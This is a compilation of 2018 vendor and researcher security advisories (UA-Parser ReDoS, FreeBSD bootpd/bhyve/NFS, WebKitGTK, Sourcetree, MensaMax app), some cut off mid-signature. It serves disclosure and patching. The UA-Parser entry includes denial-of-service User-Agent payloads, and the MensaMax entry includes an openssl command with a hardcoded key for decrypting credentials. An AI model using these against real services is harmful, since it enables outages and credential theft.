EH8HwpWeL41lppjFeL6OMDZ2+wUnuShv3pAUGwodSRXsKWsp+aWqMPcNJifkVPxs DENrziUHnXkbOnbnP25eA12j0ztCz8FjKoDh+wrjuY4BL8jzBK4ZJtmYaubrFEcD GDStnEcvCNYDK8tf0rUW2lpv4oStTex5gFpZALPjq0g28kHPuctYzoOXOf9/So1i 0kwdstsIdgydsDCHv5nXij7IDohNo+5KEJuee1cIptKftm
X41 D-Sec GmbH Security Advisory X41-2018-009: ReDoS Vulnerability in UA-Parser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-SEC GmbH Security Advisory: X41-2018-009 ReDoS Vulnerability in UA-Parser Severity Rating: Medium Confirmed Affected Versions: 2015-05-14 and newer, commit 6fd6c261274254bcbbacd77ef4b12534c7f9923d Confirmed Patched Versions: v0.6.0 released 2018-12-14, commit 010ccdc7303546cd22b9da687c29f4a996990014 Vendor: UA-Parser Project Vendor URL: https://github.com/ua-parser Vector: HTTP request Credit: X41 D-SEC GmbH, Luc Gommans Status: Public CVE: CVE-2018-20164 CVSSv3 Score: 5.3 CVSSv3 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-009-uaparser/ Summary and Impact == The programming library UA-Parser uses regular expressions to identify user agent strings. The complexity of some of the regular expressions is such that an attacker can craft special patterns that keep the server busy for a long time. By sending many requests in short order, an attacker can exhaust the amount of processing power available. This causes the website to become unavailable for legitimate visitors. In common setups, the user agent string is parsed whenever a page is visited. This means that anyone can abuse the bug, typically without authentication. There are no common circumstances which would prevent an attack from working reliably, i.e. an attacker can consistently and repeatedly exploit the issue until the site has become unreachable. For more information on regular expression-based denial of service, see the OWASP page on ReDoS: https://www.owasp.org/index.php/RegularexpressionDenialofService-ReDoS The UA-Parser project consists of a core repository, uap-core, and implementations in various languages. The regular expressions are defined in the core project and each implementation is automatically vulnerable. Product Description === When a user agent (such as a browser) connects to a website, it identifies itself with a 'user agent string'. This string helps the server determine relevant content, for example to serve the appropriate installer for visitors with different operating systems. The UA-Parser project collects regular expressions that extract the type of device and operating system from these strings. Implementations in different languages are automatically vulnerable, including the reference implementation in JavaScript: <https://github.com/ua-parser/uap-ref-impl> Proof of Concept There are multiple vulnerable regular expressions. They are collected in the file regex.yaml, for example on lines 911 and 4961. The regular expression on line 911 is as follows: (x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$ Any implementation using this library will hang for a few seconds (on comodity hardware) when sending the following HTTP request: GET / HTTP/1.0 User-Agent: x86_64 Normal user agent strings can be over a hundred bytes long: this string of 35 bytes is not an abnormal request. Adding one more byte makes the processing significantly longer. This particular regular expression was introduced in September 2018. The regular expression on line 4961 was introduced in May 2015 and can be exploited as follows: GET / HTTP/1.0 User-Agent: HbbTV/1.1.1CE-HTML/1.1;THOM;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;LF Each additional repetition of SW-Version/1; will multiply the processing time by roughly a factor 6.2. Where eleven repetitions take about seven seconds, fourteen repetitions already occupy a server for half an hour. Workarounds === As demonstrated, the input does not have to be particularly long to exploit the issue. This may be the case, and a few hundred kilobytes may slow down most regular expressions, but limiting the maximum length is not a solution by itself. The root cause is the regular expression, which should be limited in complexity. This involves manual work and there is no solution that can be applied to all regular expressions in the project. To aid in identifying problematic regular expressions, one may use projects such as <https://github.com/jagracey/RegEx-DoS>. Timeline 2018-11-26 Issue found. 2018-11-29 Permission from customer to disclose to upstream. 2018-11-29 Requested secure channel from vendor for communication. 2018-12-04 Disclosed to vendor. 2018-12-14 Patch released by vendor, CVE number requested. 2018-12-15 CVE-2018-20164 assigned. 2019-01-10 Advisory released. About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of ap
FreeBSD Security Advisory FreeBSD-SA-18:15.bootpd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:15.bootpd Security Advisory The FreeBSD Project Topic: bootpd buffer overflow Category: core Module: bootpd Announced: 2018-12-19 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2018-12-19 18:17:59 UTC (stable/12, 12.0-STABLE) 2018-12-19 18:21:07 UTC (releng/12.0, 12.0-RELEASE-p1) 2018-12-19 18:19:15 UTC (stable/11, 11.2-STABLE) 2018-12-19 18:22:25 UTC (releng/11.2, 11.2-RELEASE-p7) CVE Name: CVE-2018-17161 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bootpd utility implements an Internet Bootstrap Protocol (BOOTP) server as defined in RFC951, RFC1532, and RFC1533. II. Problem Description Due to insufficient validation of network-provided data it may be possible for a malicious attacker to craft a bootp packet which could cause a stack buffer overflow. III. Impact It is possible that the buffer overflow could lead to a Denial of Service or remote code execution. IV. Workaround Firewall rules may be used to limit reception of bootp packets to only trusted networks or hosts. Note that the bootp protocol is typically limited to a common layer 2 broadcast domain, although the bootpgw gateway can forward bootp requests and responses between subnets. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Restart bootpd if it is running in standalone mode. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch # fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch.asc # gpg --verify bootpd.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r342228 releng/12.0/ r342230 stable/11/r348229 releng/11.2/ r342231 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:15.bootpd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwane5fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKfzg/+PhmA1AKfXFSkeJJPvdF/7hjKpWaCdVAyUZsuWH5L1Tmb4Lc/pLjw22Ba Xh/sAKik6pa/nVTZCBgAqoCqmV8CdhScwvRZdVSP5CQ9vnM+6fFcybP0aCZOmiJC NGAE8nIBdazqWJfNM9HUSIbdqEOtMlVcyE0Ni/TxzcAFdzFowfDnyRm1wqI4zhM7 YL7pU0kTYJfydjK540rHB1tNBaYHSJ/6ckK3tkjwjVgMsQwNSizKrPsqycoMlMmD TqQMfDwU8W/jFLsr7OZE66eQBysSiuzYAv3IsipL+50SYgS0aoo3LwKrCcYGN6c/ S/0SOfNHDgd/7wregI5adKqWJceaqZCVedSVLm6ZaG1Vt3alIjczX9D7wIjuXPlD AkSKa0HnmSwDC8yWLJYMxuny7vy3uBAUnPiwIT3RrsDC0b28/uwNPbeSbG0Wrf9F 21PDMfeCPc2Vr/TVj9uSIo20pNtVhy+tGbx1Ilsgi3POa3n7pTOuFWHMzQVe3rZA DLYEbliPxpq9NFJ/2UZQg25weOD5ygwaYZnbsXAMY47D4kteeQOjzomgiacVhE56 oT8z804nGgGdCe4LpiHihDVzCbBvvuEPw9Edffzm7E
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0009
WebKitGTK+ and WPE WebKit Security AdvisoryWSA-2018-0009 Date reported : December 13, 2018 Advisory ID : WSA-2018-0009 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0009.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0009.html CVE identifiers : CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4437 Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3. Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4438 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management. CVE-2018-4441 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4442 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4443 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. CVE-2018-4464 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, December 13, 2018
FreeBSD Security Advisory FreeBSD-SA-18:14.bhyve
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:14.bhyve Security Advisory The FreeBSD Project Topic: Insufficient bounds checking in bhyve(8) device model Category: core Module: bhyve Announced: 2018-12-04 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2018-12-04 18:32:50 UTC (stable/11, 11.2-STABLE) 2018-12-04 18:38:32 UTC (releng/11.2, 11.2-RELEASE-p6) CVE Name: CVE-2018-17160 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bhyve hypervisor uses the bhyve(8) program to emulate support for most virtual devices used by guest operating systems. II. Problem Description Insufficient bounds checking in one of the device models provided by bhyve(8) can permit a guest operating system to overwrite memory in the bhyve(8) processing possibly permitting arbitary code execution. III. Impact A guest OS using a firmware image can cause the bhyve process to crash, or possibly execute arbitrary code on the host as root. IV. Workaround The device model in question is only enabled when booting guests with a firmware image such as the UEFI images from the bhyve-firmware package. Guests booted using bhyveload(8) or grub2-bhyve are not affected. Guests using operating systems supported by bhyveload(8) or grub2-bhyve can be booted using these tools as a workaround. No workaround is available for guest operating systems such as Windows that require a firmware image. V. Solution Perform one of the following: Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, restart guests using firmware images. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch # fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch.asc # gpg --verify bhyve.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Afterward, restart guests using firmware images. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r341486 releng/11.2/ r341488 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17160> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:14.bhyve.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwGykdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKcIQ/+Ktt7+SZPoWZQmJv6LdT6qI+na0+/9LDwBoC+Tj37heFUnhcMTxDDH4o3 nexELxF1xHmRchooRKfJr7npa8CF4jBzp2PSb+783q6TrFKe90ohlmt56lRB6gJg 3IJX5TxvAvLsqTgwPyALqyy3H5C8cY3btHPsZIArK0WVRTB74K3mr3L3IRVTcMCv 9cbUZyDO21ZIDTB5h9FYGo+6bg8hvZztmromkxssqlKKS8TUltGr/H3k6EHlnEA9 rG+6kswIgyeXNFrdksD6ni7L5Z3lwR/DFiU2d/lageQZ6vgDUa3c0KMhepfelfJR AiUtGpgfCDuHZ1NV2uyr9I6nPRHhdxPy3o2bF/B7+SLdn03tcZiO0tx3Wf68EQlt jAYFuup7+TFKoupsHlb2fkQxNOeQCr6dF+ikJDVgwCqmx2zn9tDo/tWoNdH+Jylx MDKsE369HOSRGR3Ua1ELEtOEzbGbcUHJyT6I1E2poctE61hYI+5te6pasY3ReN68 vyFMAo5ey0kJ6mi2YVcvDo2ZEb/GP1noJkdquYpIm8Ko0TPtivaMHXLIPcpLiJUc fBZexGCXJnb8f6ClMMU12U6f3H35Hz1AUPG3MSWHGgoczQBZJ
FreeBSD Security Advisory FreeBSD-SA-18:13.nfs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:13.nfsSecurity Advisory The FreeBSD Project Topic: Multiple vulnerabilities in NFS server code Category: core Module: nfs Announced: 2018-11-27 Credits:Jakub Jirasek, Secunia Research at Flexera Affects:All supported versions of FreeBSD. Corrected: 2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE) 2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5) CVE Name: CVE-2018-17157, CVE-2018-17158, CVE-2018-17159 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Network File System (NFS) allows a host to export some or all of its file systems so that other hosts can access them over the network and mount them as if they were local. FreeBSD includes both server and client implementations of NFS. II. Problem Description Insufficient and improper checking in the NFS server code could cause a denial of service or possibly remote code execution via a specially crafted network packet. III. Impact A remote attacker could cause the NFS server to crash, resulting in a denial of service, or possibly execute arbitrary code on the server. IV. Workaround No workaround is available, but systems that do not provide NFS services are not vulnerable. Additionally, it is highly recommended the NFS service port (default port number 2049) is protected via a host or network based firewall to prevent arbitrary, untrusted clients from being able to connect. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch # fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc # gpg --verify nfs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r340854 releng/11.2/ r341088 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://www.flexerasoftware.com/enterprise/company/about/secunia-research/> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlv9n85fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKJEg//Umbe1QOUgV0Z6EsdlQffNMo9MHbAz75vCqeaibI36Ng9vmkLKGlS6nCA 5mKFS+BvM5CkekBaiQ6BR8t0xWsrFwX6JCUayQ2FsCSo4rwCZms3AIbvt68vjQAm xWuQIMJzYku5+kALtcXXvVkLhMCaioVDpZmuPCO+rY79OVM4xP1MsnTfqEZSNo+n Cz2urH4eO60YsM8w05coQ3hnOsUjTCk8yCh3+R/uYK1VouLDgD8q96T1eG2ozny6 vwEMK3AjmcpvFkTIF3/2I6TTA5K+Zd+nqzhzPM5HjbLZmdQV02NHcoGaZrK1wsQw D+3wf8icBMfLt9rTUbEqVdvg5FRDkTo8/dH1wY85gWZ2wsSgCqI2wRuqBH4bp3bb Gcf2+D4vgX6YY5cZ/wFDcYWpghhrmXUbgnH7PnyVfYB0Ufta9utgMOQKMS0mUWwM DlHP+fL/A8lhPvXIhl1DtSa/TQAiAdMG1
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0008
WebKitGTK+ and WPE WebKit Security AdvisoryWSA-2018-0008 Date reported : November 21, 2018 Advisory ID : WSA-2018-0008 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0008.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0008.html CVE identifiers : CVE-2018-4345, CVE-2018-4372, CVE-2018-4373, CVE-2018-4375, CVE-2018-4376, CVE-2018-4378, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4345 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to an anonymous researcher. A cross-site scripting issue existed in WebKit. This issue was addressed with improved URL validation. CVE-2018-4372 Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2. Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4373 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to ngg, alippai, DirtYiCE, KT of Tresorit working with Trend Micro’s Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4375 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to Yu Haiwan and Wu Hongjun From Nanyang Technological University working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4376 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to 010 working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4378 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to an anonymous researcher, zhunki of 360 ESG Codesafe Team. Processing maliciously crafted web content may lead to code execution. A memory corruption issue was addressed with improved validation. CVE-2018-4382 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4386 Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4392 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to zhunki of 360 ESG Codesafe Team. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4416 Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0. Credit to lokihardt of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, November 21, 2018
October 2018 Sourcetree Advisory
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 This email refers to the advisory found at https://confluence.atlassian.com/display/SOURCETREEKB/Sourcetree+Security+Advisory+2018-10-31 . CVE ID: * CVE-2018-13396. * CVE-2018-13397. Product: Sourcetree. Affected Sourcetree product versions: 1.0b2 <= version < 3.0.0 0.5.1.0 <= version < 3.0.0 Fixed Sourcetree product versions: * for macOS, Sourcetree 3.0.0 has been released with a fix for these issues. * for Windows, Sourcetree 3.0.0 has been released with a fix for these issues. Summary: This advisory discloses critical severity security vulnerabilities. Versions of Sourcetree are affected by these vulnerabilities. Customers who have upgraded Sourcetree to version 3.0.0 (Sourcetree for macOS) or 3.0.0 (Sourcetree for Windows) are not affected. Customers who have downloaded and installed Sourcetree >= 1.0b2 but less than 3.0.0 (the fixed version for macOS) or who have downloaded and installed Sourcetree >= 0.5.1.0 but less than 3.0.0 (the fixed version for Windows), please upgrade your Sourcetree installations immediately to fix these vulnerabilities. Sourcetree for macOS - Git submodules vulnerability (CVE-2018-13396) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: The embedded version of Git used in Sourcetree for macOS was vulnerable to CVE-2018-13396. An attacker can exploit this issue if they can commit to a Git repository linked in Sourcetree for macOS. This allows them to execute arbitrary code on systems running a vulnerable version of Sourcetree for macOS. Versions of Sourcetree for macOS starting with version 1.02b before version 3.0.0 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREE-5985 . Sourcetree for Windows - Git submodules vulnerability (CVE-2018-13397) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: The embedded version of Git used in Sourcetree for Windows was vulnerable to CVE-2018-13397. An attacker can exploit this issue if they can commit to a Git repository linked in Sourcetree for Windows. This allows them to execute arbitrary code on systems running a vulnerable version of Sourcetree for Windows. Versions of Sourcetree for Windows starting with version 0.5.1.0 before version 3.0.0 are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/SRCTREEWIN-9077 . Fix: To address these issues, we've released the following versions containing a fix: * Sourcetree version 3.0.0 (Sourcetree for macOS) * Sourcetree version 3.0.0 (Sourcetree for Windows) Remediation: Upgrade Sourcetree to version 3.0.0 (macOS or Windows) or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. For a full description of the latest version of Sourcetree, see the release notes found at https://product-downloads.atlassian.com/software/sourcetree/ReleaseNotes/Sourcetree_3.0.html . You can download the latest version of Sourcetree from the download centre found at https://www.sourcetreeapp.com/ . Acknowledgements: Atlassian would like to credit Terry Zhang at Tophant for reporting these issues to us. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAlvaHbQACgkQJCCXorxS dqDfQBAAna3i7bxPHk7WrmfoZi08GjxlfWwaLNlEQooILsCXxRyiZjvCi722Et2t OoaH5W0CerizN8edElN+nGFnHHdjKiFnXH7v20f8Ua51Ye05huA63U8CvBBdIkjZ XAXRpfGQkTtnkI6nQE5wxr2AEqb+tL6eOk4Qt9WyQkP1/51RobOjkz4k/+NbGw9c HgLrO918u4HsltlHcr4/m8yGmg7qrth2Rcoa8OQg/JaDtLf+Omj7IohpaBtRcI7g B+ilyuY0LSDk2pIil2LTRP1klV7cVFJ3mhq4nzugxGju37h4O5hOVMvT/LJ+1uo+ Yuw7Lb9yr9BcZoRXJC45btzWMGXWMNnDk0HsZe1WBJoyzs0tg9aUgHZ8cDFPZFsH mdt1QjMP7WrhyDnoyxrkDjlm79VE/jYP5q6sFs5W0LgCaCCVWXkZf1OI3JdoNs1V L3SMsmOPyMpMpMlcscLgTUn/GxIeCbXUq2SjxNVGklufz5/t0MSSAN23ZbsgGen/ DX0M5BQxV9UdLLt2SmXHjI/pspXKyWAk5MOYmK68kkMdvImLPfEmvGaRxS8qlhNx b5RhyxGtCANBFQPR2Sn4HRDIZYk1tvnNlynUgMK8dvgsqf2FprngIPT1NcMAolhl sJGBPYMG+Hy3NBiYPLy3hS3UIOExsoS+Q7vnC1iNj1p9eOEPM2A= =D+B5 -END PGP SIGNATURE-
e2 Security GmbH Advisory 2018-01: MensaMax Android app / Unencrypted transmission and usage of hardcoded encryption key
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 ## e2 Security GmbH Advisory 2018-01 ## ### Unencrypted transmission and usage of hardcoded encryption key ~~ Overview Advisory ID: E2SA-2018-01 Advisory Version: 1.0 Advisory Status: Public Advisory URL: https://advisories.e2security.de/2018/E2SA-2018-01.txt Affected Product: MensaMax Android app Affected Version: 4.3 Vendor: Breustedt GmbH, https://mensamax.de Credits: Stefan Pietsch, e2 Security GmbH Issue Details # 1) The MensaMax Android application uses plain HTTP to communicate with the web server. Authentication information is transmitted in plain text with a HTTP GET request. An attacker is able to eavesdrop the communication between the application and the server because the transport layer is not encrypted. Severity: High CVSS Score: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) CVE ID: CVE-2018-15752 CWE ID: CWE-319 2) The MensaMax Android application encrypts the login username and password with a static DES key. The key is hardcoded in the Android application file. An attacker is able to retrieve the encryption key from the apk file and decrypt the login credentials retrieved from the unencrypted HTTP transmission. Severity: High CVSS Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) CVE ID: CVE-2018-15753 CWE ID: CWE-321 PoC (Proof of Concept) ## Sample HTTP request with invalid credentials: ~~~ GET /MM_Android/Service1.svc/getURLVonProjekt/GtBWTDhwry4=,s7eTGwGP_h0=,N9NkXQvJkIQ=,iDZZxd4IXZ0=,A3smkmlKRzw=,mensahome HTTP/1.1 Host: mensahome.de Connection: close User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) ~~~ The GET parameters are Base64 encoded and encrypted with a static DES key. ~~~ # echo "N9NkXQvJkIQ=" | openssl enc -a -des-ecb -d -K 436f65653130 user1 ~~~ Solution and Workaround ### Do not use the MensaMax Android app until a fixed version is released. History ### 2018-08-10: Issue found 2018-08-13: Initial Vendor contact, Issue details reported to Vendor 2018-08-15: Vendor acknowledged vulnerabilities 2018-08-23: CVE IDs added 2018-10-01: Advisory published -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEENetcDna8vCUjklqvmSVmYknuuOMFAluyLA0ACgkQmSVmYknu uOOHdQ//VFjBl+sOKkuCc/y4nH9MezI3wqMnsuk9rXgQpbdUjmZD+H9MO/Y3ylQN 0QkdQ1MSkFFHazHQD+VHJSYm/Ps7ma4+zcKAhId5zuiBFYIM2fyh6pZSGtLLB+F1 bYAWNTY45yPH/5EfeOUYd60pPPI57uic8fWLJPICnYvI5JW+1geE1I+ljNKrhSmf HCaU4JYXr19J8pZU2cVU2GWQ55CPOrIsgmGPoAbncnWguM/Seh2VL29kfy12sN3d fH70VvyZA6fBne/tKaueeYEBOYlZw0PAdBOBcktrOj19VK18xp2yE9W884F1n6fM N+EocPG2wj8irmagLvIKQZuSCbydxTC58W41WtKwSgA8LsvvOr2yZeqU+B59ouB4 Ibn6TfXSScfFj4ohPiqaPNpakGHeoREyH5sg7ipiBeELT+JyRQRNnZIQ33LFAGfN 